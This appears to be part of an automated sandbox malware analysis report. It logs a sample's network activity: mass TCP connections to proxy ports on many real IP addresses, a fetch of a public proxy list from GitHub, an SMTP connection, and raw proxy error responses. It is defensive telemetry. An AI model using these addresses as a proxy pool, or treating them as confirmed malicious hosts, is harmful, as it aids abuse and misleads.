                    Source: global trafficTCP traffic: 192.168.2.4:50128 -> 83.238.80.17:8081
                    Source: global trafficTCP traffic: 192.168.2.4:50130 -> 122.3.41.154:8090
                    Source: global trafficTCP traffic: 192.168.2.4:50134 -> 3.122.84.99:3128
                    Source: global trafficTCP traffic: 192.168.2.4:50136 -> 72.210.208.101:4145
                    Source: global trafficTCP traffic: 192.168.2.4:50138 -> 45.250.215.8:8080
                    Source: global trafficTCP traffic: 192.168.2.4:50140 -> 203.110.145.82:63128
                    Source: global trafficTCP traffic: 192.168.2.4:50141 -> 190.19.114.104:8080
                    Source: global trafficTCP traffic: 192.168.2.4:50142 -> 137.184.22.92:8000
                    Source: global trafficTCP traffic: 192.168.2.4:50144 -> 103.143.9.85:8088
                    Source: global trafficTCP traffic: 192.168.2.4:50145 -> 148.72.41.47:40350
                    Source: global trafficTCP traffic: 192.168.2.4:50146 -> 167.249.29.22:999
                    Source: global trafficTCP traffic: 192.168.2.4:50147 -> 103.4.94.2:8080
                    Source: global trafficTCP traffic: 192.168.2.4:50149 -> 212.39.114.139:5678
                    Source: global trafficTCP traffic: 192.168.2.4:50148 -> 103.221.55.101:8080
                    Source: global trafficTCP traffic: 192.168.2.4:50150 -> 201.20.80.113:666
                    Source: global trafficTCP traffic: 192.168.2.4:50151 -> 154.202.127.106:3128
                    Source: global trafficTCP traffic: 192.168.2.4:50153 -> 190.57.245.250:8080
                    Source: global trafficTCP traffic: 192.168.2.4:50155 -> 51.15.241.5:16379
                    Source: global trafficTCP traffic: 192.168.2.4:50157 -> 173.249.33.122:49382
                    Source: global trafficTCP traffic: 192.168.2.4:50158 -> 181.129.43.3:8080
                    Source: global trafficTCP traffic: 192.168.2.4:50160 -> 185.165.46.208:3128
                    Source: global trafficTCP traffic: 192.168.2.4:50159 -> 217.219.74.130:8888
                    Source: global trafficTCP traffic: 192.168.2.4:50162 -> 103.132.52.210:3128
                    Source: global trafficTCP traffic: 192.168.2.4:50164 -> 65.21.255.197:3128
                    Source: global trafficTCP traffic: 192.168.2.4:50166 -> 185.171.24.5:18675
                    Source: global trafficTCP traffic: 192.168.2.4:50165 -> 68.71.247.130:4145
                    Source: global trafficTCP traffic: 192.168.2.4:50169 -> 139.59.149.137:36841
                    Source: global trafficTCP traffic: 192.168.2.4:50168 -> 154.202.125.38:3128
                    Source: global trafficTCP traffic: 192.168.2.4:50170 -> 179.49.162.133:999
                    Source: global trafficTCP traffic: 192.168.2.4:50171 -> 75.119.200.56:46800
                    Source: global trafficTCP traffic: 192.168.2.4:50173 -> 212.115.232.79:31280
                    Source: global trafficTCP traffic: 192.168.2.4:50174 -> 145.239.2.102:15460
                    Source: global trafficTCP traffic: 192.168.2.4:50175 -> 23.152.40.14:3128
                    Source: global trafficTCP traffic: 192.168.2.4:50176 -> 222.138.76.6:9002
                    Source: global trafficTCP traffic: 192.168.2.4:50177 -> 188.252.14.7:3128
                    Source: global trafficTCP traffic: 192.168.2.4:50179 -> 103.26.108.254:84
                    Source: global trafficTCP traffic: 192.168.2.4:50180 -> 152.32.187.164:8118
                    Source: global trafficTCP traffic: 192.168.2.4:50181 -> 109.73.38.156:1080
                    Source: global trafficTCP traffic: 192.168.2.4:50182 -> 94.142.142.140:3128
                    Source: global trafficTCP traffic: 192.168.2.4:50183 -> 128.199.252.22:8000
                    Source: global trafficTCP traffic: 192.168.2.4:50186 -> 129.154.227.14:3128
                    Source: global trafficTCP traffic: 192.168.2.4:50187 -> 216.10.242.18:9735
                    Source: global trafficTCP traffic: 192.168.2.4:50189 -> 91.134.140.160:20896
                    Source: global trafficTCP traffic: 192.168.2.4:50190 -> 178.236.246.53:3128
                    Source: global trafficTCP traffic: 192.168.2.4:50191 -> 98.206.244.30:18301
                    Source: global trafficTCP traffic: 192.168.2.4:50192 -> 195.178.197.71:1080
                    Source: global trafficTCP traffic: 192.168.2.4:50193 -> 92.255.205.129:8080
                    Source: global trafficTCP traffic: 192.168.2.4:50194 -> 184.82.142.201:4153
                    Source: global trafficTCP traffic: 192.168.2.4:50195 -> 185.72.225.10:44098
                    Source: global trafficTCP traffic: 192.168.2.4:50196 -> 178.165.42.166:3128
                    Source: global trafficTCP traffic: 192.168.2.4:50197 -> 45.188.164.48:1994
                    Source: global trafficTCP traffic: 192.168.2.4:50199 -> 103.117.109.9:4153
                    Source: global trafficTCP traffic: 192.168.2.4:50202 -> 37.156.28.43:3128
                    Source: global trafficTCP traffic: 192.168.2.4:50201 -> 5.135.137.13:59124
                    Source: global trafficTCP traffic: 192.168.2.4:50203 -> 51.83.230.121:3128
                    Source: global trafficTCP traffic: 192.168.2.4:50205 -> 181.233.89.174:999
                    Source: global trafficTCP traffic: 192.168.2.4:50207 -> 162.241.66.135:42875
                    Source: global trafficTCP traffic: 192.168.2.4:50209 -> 177.131.29.211:4153
                    Source: global trafficTCP traffic: 192.168.2.4:50211 -> 47.56.110.204:8989
                    Source: global trafficTCP traffic: 192.168.2.4:50214 -> 149.28.141.180:65201
                    Source: global trafficTCP traffic: 192.168.2.4:50216 -> 65.21.188.18:8080
                    Source: global trafficTCP traffic: 192.168.2.4:50218 -> 200.110.173.17:999
                    Source: global trafficTCP traffic: 192.168.2.4:50219 -> 195.30.84.219:34090
                    Source: global trafficTCP traffic: 192.168.2.4:50220 -> 103.230.126.123:48359
                    Source: global trafficTCP traffic: 192.168.2.4:50221 -> 154.201.62.249:3128
                    Source: global trafficTCP traffic: 192.168.2.4:50222 -> 104.164.183.251:3128
                    Source: global trafficTCP traffic: 192.168.2.4:50223 -> 162.214.102.195:56755
                    Source: global trafficTCP traffic: 192.168.2.4:50224 -> 51.75.126.150:22935
                    Source: global trafficTCP traffic: 192.168.2.4:50225 -> 72.10.160.171:6227
                    Source: global trafficTCP traffic: 192.168.2.4:50226 -> 164.92.237.188:52306
                    Source: global trafficTCP traffic: 192.168.2.4:50227 -> 154.202.121.64:3128
                    Source: global trafficTCP traffic: 192.168.2.4:50229 -> 190.52.165.120:8080
                    Source: global trafficTCP traffic: 192.168.2.4:50230 -> 186.156.161.235:3128
                    Source: global trafficTCP traffic: 192.168.2.4:50231 -> 91.121.89.41:3128
                    Source: global trafficTCP traffic: 192.168.2.4:50232 -> 109.205.181.27:50344
                    Source: global trafficTCP traffic: 192.168.2.4:50234 -> 190.220.228.147:8080
                    Source: global trafficTCP traffic: 192.168.2.4:50235 -> 182.160.110.154:9898
                    Source: global trafficTCP traffic: 192.168.2.4:50236 -> 20.205.61.143:8123
                    Source: global trafficTCP traffic: 192.168.2.4:50238 -> 58.69.201.117:8082
                    Source: global trafficTCP traffic: 192.168.2.4:50240 -> 83.219.145.106:3128
                    Source: global trafficTCP traffic: 192.168.2.4:50241 -> 50.63.12.33:50781
                    Source: global trafficTCP traffic: 192.168.2.4:50245 -> 103.162.50.13:8080
                    Source: global trafficTCP traffic: 192.168.2.4:50246 -> 109.205.243.10:5678
                    Source: global trafficTCP traffic: 192.168.2.4:50247 -> 103.78.0.44:3129
                    Source: global trafficTCP traffic: 192.168.2.4:50248 -> 41.223.234.116:37259
                    Source: global trafficTCP traffic: 192.168.2.4:50249 -> 51.79.87.144:30464
                    Source: global trafficTCP traffic: 192.168.2.4:50250 -> 190.61.48.24:999
                    Source: global trafficTCP traffic: 192.168.2.4:50252 -> 195.30.84.213:34090
                    Source: global trafficTCP traffic: 192.168.2.4:50253 -> 200.24.154.218:999
                    Source: global trafficTCP traffic: 192.168.2.4:50254 -> 111.38.73.92:9002
                    Source: global trafficTCP traffic: 192.168.2.4:50257 -> 195.158.16.9:3128
                    Source: global trafficTCP traffic: 192.168.2.4:50258 -> 103.59.45.89:8080
                    Source: global trafficTCP traffic: 192.168.2.4:50259 -> 98.170.57.231:4145
                    Source: global trafficTCP traffic: 192.168.2.4:50260 -> 5.104.174.199:23500
                    Source: global trafficTCP traffic: 192.168.2.4:50261 -> 77.68.111.73:3128
                    Source: global trafficTCP traffic: 192.168.2.4:50264 -> 79.137.36.165:8080
                    Source: global trafficTCP traffic: 192.168.2.4:50265 -> 203.161.32.218:52903
                    Source: global trafficTCP traffic: 192.168.2.4:50267 -> 152.228.134.212:32148
                    Source: global trafficTCP traffic: 192.168.2.4:50269 -> 170.83.246.128:8080
                    Source: global trafficTCP traffic: 192.168.2.4:50270 -> 45.73.0.118:5678
                    Source: global trafficTCP traffic: 192.168.2.4:50271 -> 2.189.148.1:8080
                    Source: global trafficTCP traffic: 192.168.2.4:50272 -> 190.109.72.17:33633
                    Source: global trafficTCP traffic: 192.168.2.4:50273 -> 185.51.92.103:51327
                    Source: global trafficTCP traffic: 192.168.2.4:50275 -> 191.101.78.207:3128
                    Source: global trafficTCP traffic: 192.168.2.4:50274 -> 202.162.219.12:1080
                    Source: global trafficTCP traffic: 192.168.2.4:50277 -> 51.195.139.95:24604
                    Source: global trafficTCP traffic: 192.168.2.4:50279 -> 162.210.192.135:16489
                    Source: global trafficTCP traffic: 192.168.2.4:50282 -> 154.202.98.109:3128
                    Source: global trafficTCP traffic: 192.168.2.4:50283 -> 72.167.220.46:15758
                    Source: global trafficTCP traffic: 192.168.2.4:50285 -> 193.34.93.221:33861
                    Source: global trafficTCP traffic: 192.168.2.4:50286 -> 45.43.71.147:6745
                    Source: global trafficTCP traffic: 192.168.2.4:50287 -> 23.95.216.90:15673
                    Source: global trafficTCP traffic: 192.168.2.4:50288 -> 85.214.244.174:3128
                    Source: global trafficTCP traffic: 192.168.2.4:50290 -> 103.82.233.2:53281
                    Source: global trafficTCP traffic: 192.168.2.4:50289 -> 70.32.26.23:36546
                    Source: global trafficTCP traffic: 192.168.2.4:50291 -> 132.148.154.97:10958
                    Source: global trafficTCP traffic: 192.168.2.4:50293 -> 69.94.136.71:8443
                    Source: global trafficTCP traffic: 192.168.2.4:50294 -> 111.225.152.207:8089
                    Source: global trafficTCP traffic: 192.168.2.4:50296 -> 95.111.91.50:10801
                    Source: global trafficTCP traffic: 192.168.2.4:50297 -> 41.160.23.114:4153
                    Source: global trafficTCP traffic: 192.168.2.4:50298 -> 1.15.62.12:5678
                    Source: global trafficTCP traffic: 192.168.2.4:50299 -> 96.9.86.218:5678
                    Source: global trafficTCP traffic: 192.168.2.4:50300 -> 171.35.172.147:9999
                    Source: global trafficTCP traffic: 192.168.2.4:50301 -> 104.200.135.46:4145
                    Source: global trafficTCP traffic: 192.168.2.4:50302 -> 118.98.166.56:8080
                    Source: global trafficTCP traffic: 192.168.2.4:50304 -> 38.41.53.149:9090
                    Source: global trafficTCP traffic: 192.168.2.4:50305 -> 199.102.106.94:4145
                    Source: global trafficTCP traffic: 192.168.2.4:50306 -> 154.73.28.89:8080
                    Source: global trafficTCP traffic: 192.168.2.4:50307 -> 104.238.100.115:45314
                    Source: global trafficTCP traffic: 192.168.2.4:50309 -> 183.100.14.134:8000
                    Source: global trafficTCP traffic: 192.168.2.4:50311 -> 45.225.184.177:999
                    Source: global trafficTCP traffic: 192.168.2.4:50312 -> 37.187.88.32:8001
                    Source: global trafficTCP traffic: 192.168.2.4:50314 -> 219.129.167.82:2222
                    Source: global trafficTCP traffic: 192.168.2.4:50315 -> 92.204.135.4:44712
                    Source: global trafficTCP traffic: 192.168.2.4:50316 -> 91.203.114.71:42905
                    Source: global trafficTCP traffic: 192.168.2.4:50317 -> 111.225.152.100:8089
                    Source: global trafficTCP traffic: 192.168.2.4:50319 -> 185.134.99.62:4153
                    Source: global trafficTCP traffic: 192.168.2.4:50321 -> 134.236.118.74:4145
                    Source: global trafficTCP traffic: 192.168.2.4:50323 -> 190.186.23.99:5678
                    Source: global trafficTCP traffic: 192.168.2.4:50324 -> 178.212.196.177:9999
                    Source: global trafficTCP traffic: 192.168.2.4:50325 -> 167.71.5.83:3128
                    Source: global trafficTCP traffic: 192.168.2.4:50326 -> 80.240.20.183:30002
                    Source: global trafficTCP traffic: 192.168.2.4:50328 -> 174.77.111.196:4145
                    Source: global trafficTCP traffic: 192.168.2.4:50329 -> 148.72.212.252:50415
                    Source: global trafficTCP traffic: 192.168.2.4:50332 -> 107.180.101.226:59810
                    Source: global trafficTCP traffic: 192.168.2.4:50335 -> 190.136.50.67:3128
                    Source: global trafficTCP traffic: 192.168.2.4:50336 -> 39.165.0.137:9002
                    Source: global trafficTCP traffic: 192.168.2.4:50337 -> 103.172.1.35:8080
                    Source: global trafficTCP traffic: 192.168.2.4:50338 -> 167.172.159.43:60153
                    Source: global trafficTCP traffic: 192.168.2.4:50339 -> 164.92.85.180:23971
                    Source: global trafficTCP traffic: 192.168.2.4:50340 -> 181.205.41.210:7654
                    Source: global trafficTCP traffic: 192.168.2.4:50341 -> 161.97.74.176:30000
                    Source: global trafficTCP traffic: 192.168.2.4:50342 -> 223.25.101.86:5678
                    Source: global trafficTCP traffic: 192.168.2.4:50343 -> 162.240.19.133:51226
                    Source: global trafficTCP traffic: 192.168.2.4:50344 -> 103.133.223.211:2525
                    Source: global trafficTCP traffic: 192.168.2.4:50346 -> 167.99.123.158:59431
                    Source: global trafficTCP traffic: 192.168.2.4:50349 -> 91.202.230.219:8080
                    Source: global trafficTCP traffic: 192.168.2.4:50350 -> 111.225.153.200:8089
                    Source: global trafficTCP traffic: 192.168.2.4:50352 -> 168.196.246.118:8080
                    Source: global trafficTCP traffic: 192.168.2.4:50354 -> 123.231.230.58:31196
                    Source: global trafficTCP traffic: 192.168.2.4:50356 -> 51.210.183.2:8080
                    Source: global trafficTCP traffic: 192.168.2.4:50360 -> 64.202.186.2:44692
                    Source: global trafficTCP traffic: 192.168.2.4:50361 -> 178.252.170.222:3128
                    Source: global trafficTCP traffic: 192.168.2.4:50362 -> 144.21.53.111:3128
                    Source: global trafficTCP traffic: 192.168.2.4:50365 -> 109.238.12.156:29834
                    Source: global trafficTCP traffic: 192.168.2.4:50366 -> 149.126.101.162:8080
                    Source: global trafficTCP traffic: 192.168.2.4:50371 -> 44.226.167.102:3128
                    Source: global trafficTCP traffic: 192.168.2.4:50373 -> 181.209.100.2:999
                    Source: global trafficTCP traffic: 192.168.2.4:50376 -> 185.169.181.22:4145
                    Source: global trafficTCP traffic: 192.168.2.4:50377 -> 193.106.57.7:33429
                    Source: global trafficTCP traffic: 192.168.2.4:50378 -> 186.215.87.194:6025
                    Source: global trafficTCP traffic: 192.168.2.4:50379 -> 188.164.193.178:33338
                    Source: global trafficTCP traffic: 192.168.2.4:50380 -> 51.210.45.148:3865
                    Source: global trafficTCP traffic: 192.168.2.4:50381 -> 80.194.38.106:3333
                    Source: global trafficTCP traffic: 192.168.2.4:50382 -> 188.164.196.31:62105
                    Source: global trafficTCP traffic: 192.168.2.4:50383 -> 161.97.160.158:5814
                    Source: global trafficTCP traffic: 192.168.2.4:50384 -> 46.0.203.140:4890
                    Source: global trafficTCP traffic: 192.168.2.4:50385 -> 46.214.153.223:5678
                    Source: global trafficTCP traffic: 192.168.2.4:50387 -> 5.9.141.151:30000
                    Source: global trafficTCP traffic: 192.168.2.4:50388 -> 191.97.16.160:999
                    Source: global trafficTCP traffic: 192.168.2.4:50389 -> 196.251.221.30:8104
                    Source: global trafficTCP traffic: 192.168.2.4:50390 -> 103.140.35.11:4145
                    Source: global trafficTCP traffic: 192.168.2.4:50391 -> 34.64.104.210:53128
                    Source: global trafficTCP traffic: 192.168.2.4:50392 -> 190.61.32.168:6969
                    Source: global trafficTCP traffic: 192.168.2.4:50393 -> 185.225.200.247:34041
                    Source: global trafficTCP traffic: 192.168.2.4:50394 -> 115.144.163.198:20986
                    Source: global trafficTCP traffic: 192.168.2.4:50395 -> 103.37.82.134:39873
                    Source: global trafficTCP traffic: 192.168.2.4:50397 -> 72.10.160.172:2955
                    Source: global trafficTCP traffic: 192.168.2.4:50398 -> 103.180.198.162:8181
                    Source: global trafficTCP traffic: 192.168.2.4:50399 -> 171.4.71.196:8080
                    Source: global trafficTCP traffic: 192.168.2.4:50402 -> 186.103.130.94:8080
                    Source: global trafficTCP traffic: 192.168.2.4:50405 -> 37.252.13.248:3128
                    Source: global trafficTCP traffic: 192.168.2.4:50407 -> 129.213.52.124:3128
                    Source: global trafficTCP traffic: 192.168.2.4:50409 -> 45.43.84.163:6788
                    Source: global trafficTCP traffic: 192.168.2.4:50411 -> 212.3.112.128:35860
                    Source: global trafficTCP traffic: 192.168.2.4:50412 -> 179.1.192.17:999
                    Source: global trafficTCP traffic: 192.168.2.4:50413 -> 165.227.196.37:58628
                    Source: global trafficTCP traffic: 192.168.2.4:50414 -> 212.5.132.74:5678
                    Source: global trafficTCP traffic: 192.168.2.4:50416 -> 116.118.98.21:5678
                    Source: global trafficTCP traffic: 192.168.2.4:50417 -> 193.143.1.201:1080
                    Source: global trafficTCP traffic: 192.168.2.4:50418 -> 77.37.132.129:8080
                    Source: global trafficTCP traffic: 192.168.2.4:50420 -> 115.127.114.209:5020
                    Source: global trafficTCP traffic: 192.168.2.4:50422 -> 187.102.208.254:999
                    Source: global trafficTCP traffic: 192.168.2.4:50423 -> 177.184.72.22:4145
                    Source: global trafficTCP traffic: 192.168.2.4:50424 -> 61.7.183.152:4145
                    Source: global trafficHTTP traffic detected: GET /TheSpeedX/PROXY-List/blob/master/http.txt HTTP/1.1Host: github.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 5.42.81.57 5.42.81.57
                    Source: Joe Sandbox ViewIP Address: 173.209.66.178 173.209.66.178
                    Source: Joe Sandbox ViewIP Address: 212.110.188.202 212.110.188.202
                    Source: Joe Sandbox ViewIP Address: 24.230.33.96 24.230.33.96
                    Source: Joe Sandbox ViewIP Address: 50.169.37.50 50.169.37.50
                    Source: Joe Sandbox ViewASN Name: BYTEMARK-ASGB BYTEMARK-ASGB
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: global trafficTCP traffic: 192.168.2.4:56001 -> 64.202.191.120:587
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.23.141.196
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.181.148.187
                    Source: unknownTCP traffic detected without corresponding DNS query: 50.172.227.202
                    Source: unknownTCP traffic detected without corresponding DNS query: 181.209.113.234
                    Source: unknownTCP traffic detected without corresponding DNS query: 41.111.243.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 81.17.94.50
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.148.99.107
                    Source: unknownTCP traffic detected without corresponding DNS query: 159.223.71.71
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.27.122.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 128.199.221.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 68.185.57.66
                    Source: unknownTCP traffic detected without corresponding DNS query: 221.231.13.198
                    Source: unknownTCP traffic detected without corresponding DNS query: 103.124.198.118
                    Source: unknownTCP traffic detected without corresponding DNS query: 212.69.12.121
                    Source: unknownTCP traffic detected without corresponding DNS query: 49.0.34.194
                    Source: unknownTCP traffic detected without corresponding DNS query: 160.153.245.187
                    Source: unknownTCP traffic detected without corresponding DNS query: 96.113.159.162
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.238.111.107
                    Source: unknownTCP traffic detected without corresponding DNS query: 222.124.130.198
                    Source: unknownTCP traffic detected without corresponding DNS query: 184.181.217.201
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.35.140.42
                    Source: unknownTCP traffic detected without corresponding DNS query: 154.202.123.46
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.253.117
                    Source: unknownTCP traffic detected without corresponding DNS query: 102.212.86.57
                    Source: unknownTCP traffic detected without corresponding DNS query: 168.227.40.66
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.180.101.18
                    Source: unknownTCP traffic detected without corresponding DNS query: 103.134.38.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 136.243.148.97
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.23.141.196
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.23.141.196
                    Source: unknownTCP traffic detected without corresponding DNS query: 132.148.129.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 208.109.13.93
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.23.214.53
                    Source: unknownTCP traffic detected without corresponding DNS query: 67.43.228.250
                    Source: unknownTCP traffic detected without corresponding DNS query: 83.238.80.12
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.169.226.96
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.27.122.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.27.122.6
                    Source: unknownTCP traffic detected without corresponding DNS query: 125.87.82.86
                    Source: unknownTCP traffic detected without corresponding DNS query: 146.190.84.209
                    Source: unknownTCP traffic detected without corresponding DNS query: 78.47.35.35
                    Source: unknownTCP traffic detected without corresponding DNS query: 117.160.250.132
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.122.184.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 92.246.139.113
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.205.197.226
                    Source: unknownTCP traffic detected without corresponding DNS query: 139.99.9.218
                    Source: unknownTCP traffic detected without corresponding DNS query: 88.199.164.140
                    Source: unknownTCP traffic detected without corresponding DNS query: 51.158.105.107
                    Source: unknownTCP traffic detected without corresponding DNS query: 137.184.15.145
                    Source: unknownTCP traffic detected without corresponding DNS query: 184.181.217.201
                    Source: global trafficHTTP traffic detected: GET /TheSpeedX/PROXY-List/blob/master/http.txt HTTP/1.1Host: github.comConnection: Keep-Alive
                    Source: unknownDNS traffic detected: queries for: github.com
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlServer: Zscaler/6.2Cache-Control: no-cacheAccess-Control-Allow-Origin: *Content-length: 13631Data Raw: 3c 21 2d 2d 23 20 49 64 3a 20 63 6c 6f 73 65 64 70 72 6f 78 79 2e 68 74 6d 6c 20 32 38 35 31 34 34 20 32 30 32 31 2d 30 36 2d 31 36 20 30 35 3a 30 32 3a 30 36 5a 20 73 7a 68 61 6e 67 20 2d 2d 3e 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 63 2e 6f 72 67 2f 54 52 2f 31 39 39 39 2f 52 45 43 2d 68 74 6d 6c 34 30 31 2d 31 39 39 39 31 32 32 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 5a 73 63 61 6c 65 72 20 6d 61 6b 65 73 20 74 68 65 20 69 6e 74 65 72 6e 65 74 20 73 61 66 65 20 66 6f 72 20 62 75 73 69 6e 65 73 73 65 73 20 62 79 20 70 72 6f 74 65 63 74 69 6e 67 20 74 68 65 69 72 20 65 6d 70 6c 6f 79 65 65 73 20 66 72 6f 6d 20 6d 61 6c 77 61 72 65 2c 20 76 69 72 75 73 65 73 2c 20 61 6e 64 20 6f 74 68 65 72 20 73 65 63 75 72 69 74 79 20 74 68 72 65 61 74 73 2e 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 74 69 74 6c 65 3e 49 6e 74 65 72 6e 65 74 20 53 65 63 75 72 69 74 79 20 62 79 20 5a 73 63 61 6c 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 76 61 72 20 64 65 66 4c 61 6e 67 20 3d 20 27 65 6e 5f 55 53 27 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 3c 69 6d 67 20 61 6c 74 3d 22 5a 73 63 61 6c 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 7a 73 63 61 6c 65 72 74 68 72 65 65 2e 6e 65 74 2f 69 6d 67 5f 6c 6f 67 6f 5f 6e 65 77 31 2e 70 6e 67 22 3e 2d 2d 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 33 65 33 65 33 3b 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 0a 63 6f 6c 6f 72 3a 23 34 42 34 46 35 34 3b 0a 7d 0a 61 20 7b 0a 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 0a 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 0a 63 6f 6c 6f 72 3a 23 30 30 39 64 64 30 3b 0a 7d 0a 74 61 62 6c 65 20 7b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 0a 7d 0a 74 64 20 74 61 62 6c 65 20 7b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 7d 0a 69 6d
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Fri, 23 Feb 2024 08:45:16 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Fri, 23 Feb 2024 08:45:16 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Fri, 23 Feb 2024 08:45:16 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 23 Feb 2024 08:45:19 GMTServer: ApacheContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Fri, 23 Feb 2024 08:45:20 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
